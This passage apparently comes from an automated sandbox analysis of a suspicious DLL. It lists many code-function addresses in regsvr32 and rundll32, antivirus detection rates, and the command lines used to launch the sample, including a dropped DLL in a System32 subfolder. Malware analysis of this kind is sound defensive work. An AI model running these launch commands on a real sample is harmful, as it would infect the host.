                        Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_000000018001C67C
                        Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_00000001800126AC
                        Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_00000001800426C8
                        Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_00000001800086C4
                        Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_000000018001A6EC
                        Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_000000018000A734
                        Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_000000018001C784
                        Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_00000001800227D0
                        Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_000000018001E7F4
                        Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_0000000180016828
                        Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_000000018001C88C
                        Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_00000001800228DC
                        Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_000000018001A918
                        Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_0000000180024934
                        Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_000000018004E9B0
                        Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_00000001800229E4
                        Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_000000018001E9F0
                        Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_0000000180024A40
                        Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_0000000180008A50
                        Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_000000018001CAB8
                        Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_0000000180022AF0
                        Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_000000018001EB0C
                        Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_000000018001AB44
                        Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_0000000180024B48
                        Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_000000018000EB58
                        Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_0000000180022BF8
                        Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_000000018001EC14
                        Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_0000000180024C54
                        Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_000000018001CCE4
                        Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_0000000180022D00
                        Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_000000018001ED54
                        Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_0000000180024D5C
                        Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_000000018001AD70
                        Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_0000000180022E08
                        Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_0000000180044E04
                        Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_000000018001EE60
                        Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_0000000180024E64
                        Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_000000018001AE78
                        Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_0000000180022F10
                        Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_000000018001CF10
                        Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_000000018001EF68
                        Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_0000000180024F6C
                        Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_000000018000EF80
                        Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_000000018001AFA8
                        Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_0000000180020FCC
                        Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_000000018004AFD0
                        Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_000000018004CFEC
                        Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_000000018001D018
                        Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_0000000180013044
                        Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_0000000180009070
                        Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_0000000180025074
                        Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_000000018001B0C4
                        Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_000000018001D120
                        Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_000000018002713C
                        Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_000000018001D23C
                        Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_000000018003D290
                        Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_000000018001B2B0
                        Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_0000000180027328
                        Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_000000018004B380
                        Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_000000018000D3A0
                        Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_000000018001D428
                        Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_000000018001B49C
                        Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_000000018001F4C0
                        Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_00000001800234CC
                        Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_0000000180027514
                        Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_0000000180011540
                        Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_000000018002557C
                        Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_00000001800235D4
                        Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_000000018000B5D8
                        Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_000000018003F5E4
                        Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_000000018000F608
                        Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_000000018001D614
                        Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_000000018002964C
                        Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_000000018003D650
                        Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_0000000180025684
                        Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_00000001800436B4
                        Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_00000001800236DC
                        Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_000000018001B6DC
                        Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_0000000180027714
                        Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_000000018002578C
                        Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_00000001800237E4
                        Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_000000018004383C
                        Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_000000018005784C
                        Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_000000018001D854
                        Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_0000000180025894
                        Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_000000018001B8C4
                        Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_00000001800238EC
                        Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_00000001800498EC
                        Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_00000001800278FC
                        Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_000000018004B940
                        Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_000000018000B96C
                        Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_000000018002599C
                        Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_00000001800199DC
                        Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_00000001800239F4
                        Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_0000000180059A0C
                        Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_000000018001DA3C
                        Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_0000000180025AA4
                        Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_000000018001BAAC
                        Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_000000018003DAC0
                        Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_0000000180027AE4
                        Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_0000000180019AE4
                        Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_0000000180023AF8
                        Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_0000000180031B10
                        Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_0000000180045B80
                        Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_0000000180025BA8
                        Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_0000000180023C00
                        Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_000000018001DC24
                        Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_0000000180025CB0
                        Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_000000018001BCD4
                        Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_0000000180019D14
                        Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_0000000180015D9C
                        Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_0000000180043DBC
                        Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_000000018001BDDC
                        Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_000000018004BE14
                        Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_000000018001DE4C
                        Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_000000018001FE64
                        Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_0000000180019F44
                        Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_000000018000BF8C
                        Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_02800000
                        Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_028583D8
                        Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_02860358
                        Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_02852008
                        Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_0285606C
                        Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_0285061C
                        Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_02841A84
                        Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_0285BA54
                        Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_02850B94
                        Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_028629A0
                        Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_02844FEC
                        Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_02859DE4
                        Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_0285A2DC
                        Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_028492E8
                        Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_028572F8
                        Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_02841228
                        Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_0285223C
                        Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_02859270
                        Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_0285327C
                        Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_028443A0
                        Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_0284E3B4
                        Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_028653DC
                        Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_0285C324
                        Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_0285F320
                        Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_02861320
                        Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_02851350
                        Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_02845360
                        Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_02859084
                        Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_028430B8
                        Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_028660C8
                        Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_028650D0
                        Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_028540E0
                        Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_0285D0E8
                        Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_02841000
                        Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_0285101C
                        Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_02853044
                        Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_02842050
                        Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_0285C078
                        Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_02864184
                        Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_0285C18C
                        Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_0284B1E0
                        Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_028551F0
                        Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_028571F0
                        Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_0284D148
                        Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_02858154
                        Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_02861150
                        Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_0285115C
                        Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_0284E6B8
                        Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_028526C4
                        Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_028436D0
                        Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_02863604
                        Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_02866644
                        Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_0285E668
                        Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_02857780
                        Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_028597B0
                        Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_0285B7C4
                        Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_0285373C
                        Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_0284175C
                        Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_0285D484
                        Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_02854490
                        Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_028484B8
                        Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_0284A4C8
                        Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_028614EC
                        Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_02856444
                        Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_02857468
                        Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_028435B8
                        Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_028485EC
                        Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_0285051C
                        Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_02862528
                        Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_0284E534
                        Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_0284F54C
                        Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_02866A84
                        Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_02852AB4
                        Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_02863AE8
                        Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_02856A00
                        Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_02851A08
                        Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_02854A38
                        Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_0284CA68
                        Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_0285ABBC
                        Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_02852BF0
                        Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_02849BF8
                        Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_02842B04
                        Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_0284AB08
                        Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_02853B28
                        Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_02847B30
                        Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_02865898
                        Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_02843800
                        Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_02849814
                        Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_0285C810
                        Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_0284881C
                        Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_0285F854
                        Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_0286386C
                        Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_02864980
                        Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_028619AC
                        Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_0285D93C
                        Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_02849938
                        Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_02842EA8
                        Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_0285BE10
                        Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_0285EE18
                        Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_02863E4C
                        Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_02848E6C
                        Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_02846F8C
                        Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_02845FBC
                        Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_02863FD8
                        Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_02853F18
                        Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_02859F24
                        Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_02865F48
                        Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_0284AF54
                        Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_02861F54
                        Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_0284CF5C
                        Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_02856F5C
                        Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_02841CAC
                        Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_02865C18
                        Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_02861C50
                        Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_02847C64
                        Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_02844D84
                        Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_0284DD20
                        Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_02854D40
                        Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_02856D48
                        Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_02849D50
                        Source: C:\Windows\System32\rundll32.exeCode function: 3_2_0000025325740000
                        Source: C:\Windows\System32\rundll32.exeCode function: 4_2_00000237550E0000
                        Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_01120000
                        Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_02911A84
                        Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_0291A4C8
                        Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_02933AE8
                        Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_0292061C
                        Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_02930A20
                        Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_0292F854
                        Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_0292BA54
                        Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_0292606C
                        Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_02916F8C
                        Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_02915FBC
                        Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_029283D8
                        Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_029251F0
                        Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_02929DE4
                        Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_02914FEC
                        Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_0292AD10
                        Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_0292C324
                        Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_02930358
                        Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_02924490
                        Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_02935898
                        Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_0292D484
                        Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_02929084
                        Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_02936A84
                        Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_02922AB4
                        Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_029130B8
                        Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_029184B8
                        Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_0291E6B8
                        Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_02912EA8
                        Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_02911CAC
                        Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_029136D0
                        Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_029350D0
                        Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_0292A2DC
                        Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_029226C4
                        Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_029360C8
                        Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_029272F8
                        Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_029240E0
                        Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_029192E8
                        Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_0292D0E8
                        Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_029314EC
                        Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_0292C810
                        Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_0292BE10
                        Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_02919814
                        Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_0292EE18
                        Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_02935C18
                        Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_0291881C
                        Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_0292101C
                        Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_02913800
                        Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_02911000
                        Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_02926A00
                        Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_02933604
                        Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_02921A08
                        Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_02922008
                        Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_02924A38
                        Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_0292223C
                        Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_02911228
                        Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_02912050
                        Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_02931C50
                        Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_02923044
                        Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_02926444
                        Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_02936644
                        Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_02933E4C
                        Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_02929270
                        Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_0292C078
                        Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_0292327C
                        Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_02917C64
                        Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_0291CA68
                        Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_0292E668
                        Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_02927468
                        Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_02918E6C
                        Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_0293386C
                        Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_02920B94
                        Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_02927780
                        Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_02934980
                        Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_02914D84
                        Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_02934184
                        Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_0292C18C
                        Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_029297B0
                        Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_0291E3B4
                        Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_029135B8
                        Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_0292ABBC
                        Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_029143A0
                        Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_029329A0
                        Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_029319AC
                        Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_02933FD8
                        Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_029353DC
                        Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_0292B7C4
                        Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_02922BF0
                        Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_029271F0
                        Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_02919BF8
                        Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_0291B1E0
                        Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_029185EC
                        Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_02923F18
                        Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_0292051C
                        Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_02912B04
                        Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_0291AB08
                        Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_02917B30
                        Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_0291E534
                        Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_02919938
                        Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_0292D93C
                        Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_0292373C
                        Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_0291DD20
                        Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_0292F320
                        Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_02931320
                        Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_02929F24
                        Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_02923B28
                        Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_02932528
                        Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_02919D50
                        Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_02921350
                        Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_02931150
                        Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_0291AF54
                        Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_02928154
                        Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_02931F54
                        Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_0291175C
                        Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_0291CF5C
                        Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_02926F5C
                        Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_0292115C
                        Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_02924D40
                        Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_0291D148
                        Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_02926D48
                        Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_02935F48
                        Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_0291F54C
                        Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_02915360
                        Source: C:\Windows\System32\regsvr32.exeCode function: String function: 0000000180037D34 appears 44 times
                        Source: C:\Windows\System32\regsvr32.exeSection loaded: sfc.dll
                        Source: C:\Windows\System32\regsvr32.exeSection loaded: sfc.dll
                        Source: 5CUFfVMSaQ.dllStatic PE information: Number of sections : 12 > 10
                        Source: 5CUFfVMSaQ.dllVirustotal: Detection: 21%
                        Source: 5CUFfVMSaQ.dllMetadefender: Detection: 45%
                        Source: 5CUFfVMSaQ.dllReversingLabs: Detection: 80%
                        Source: 5CUFfVMSaQ.dllStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                        Source: C:\Windows\System32\loaddll64.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                        Source: unknownProcess created: C:\Windows\System32\loaddll64.exe loaddll64.exe "C:\Users\user\Desktop\5CUFfVMSaQ.dll"
                        Source: C:\Windows\System32\loaddll64.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /C rundll32.exe "C:\Users\user\Desktop\5CUFfVMSaQ.dll",#1
                        Source: C:\Windows\System32\loaddll64.exeProcess created: C:\Windows\System32\regsvr32.exe regsvr32.exe /s C:\Users\user\Desktop\5CUFfVMSaQ.dll
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\rundll32.exe rundll32.exe "C:\Users\user\Desktop\5CUFfVMSaQ.dll",#1
                        Source: C:\Windows\System32\loaddll64.exeProcess created: C:\Windows\System32\rundll32.exe rundll32.exe C:\Users\user\Desktop\5CUFfVMSaQ.dll,ABeFtrnwmgAedx
                        Source: C:\Windows\System32\loaddll64.exeProcess created: C:\Windows\System32\rundll32.exe rundll32.exe C:\Users\user\Desktop\5CUFfVMSaQ.dll,AEjATaIExpQg
                        Source: C:\Windows\System32\regsvr32.exeProcess created: C:\Windows\System32\regsvr32.exe C:\Windows\system32\regsvr32.exe "C:\Windows\system32\NCybOKcMqaEIN\jnEWIdoCfnPf.dll"
                        Source: C:\Windows\System32\loaddll64.exeProcess created: C:\Windows\System32\rundll32.exe rundll32.exe C:\Users\user\Desktop\5CUFfVMSaQ.dll,AbfBlUFQKbpevAFdaCpElBdscB
                        Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
